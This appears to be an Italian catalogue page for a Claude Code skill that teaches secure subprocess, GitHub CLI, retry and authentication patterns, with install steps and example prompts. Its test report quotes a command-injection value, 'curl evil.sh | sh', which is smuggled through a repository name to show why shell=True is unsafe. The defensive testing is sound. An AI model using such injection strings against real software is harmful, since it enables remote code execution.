API Integration Patterns

Pattern API/CLI sicuri per subprocessi: no shell=True, comandi whitelistati, backoff di retry, validazione token.

di akaszubski · akaszubski/autonomous-dev

Promosso ★ 8.4/10

API Integration Patterns — Pattern API/CLI sicuri per subprocessi: no shell=True, comandi whitelistati, backoff di retry, validazione token.

Cosa fa

Una skill di pattern di riferimento che fornisce pattern di codice sicuri per subprocessi, GitHub CLI, retry-con-backoff, autenticazione e limitazione della frequenza quando Claude scrive codice di integrazione API o CLI esterna. Si attiva su parole chiave subprocess/gh-cli/API-call/retry/auth ed esclude esplicitamente modifiche a funzioni interne o solo di configurazione.

Rapporto di test

Test reale CWE-78: il codice di base utilizzava shell=True con un nome di repository f-string, permettendo a un valore di repository creato di aggiungere 'curl evil.sh | sh'; la versione della skill con argv-array + shell=False ha passato la stessa stringa malevola tramite gh come un singolo argomento inerte. Concreto, non cosmetico.

Testato il: 2026-07-15 · Claude Code 2.x (agent harness)

Installazione

git clone https://github.com/akaszubski/autonomous-dev
cd autonomous-dev
mkdir -p ~/.claude/skills
cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns

Comandi e prompt di esempio

  • /api-integration-patternsPattern API/CLI sicuri per subprocessi: no shell=True, comandi whitelistati, backoff di retry, validazione token.

Gli skill si attivano con richieste in linguaggio naturale, senza comandi da ricordare. Dopo l'installazione, prompt come questi lo attivano (in inglese):

  • Write a Python function that lists GitHub issues via the gh CLI
  • Add retry logic with exponential backoff to my API client code
  • Help me safely handle subprocess calls without shell injection risk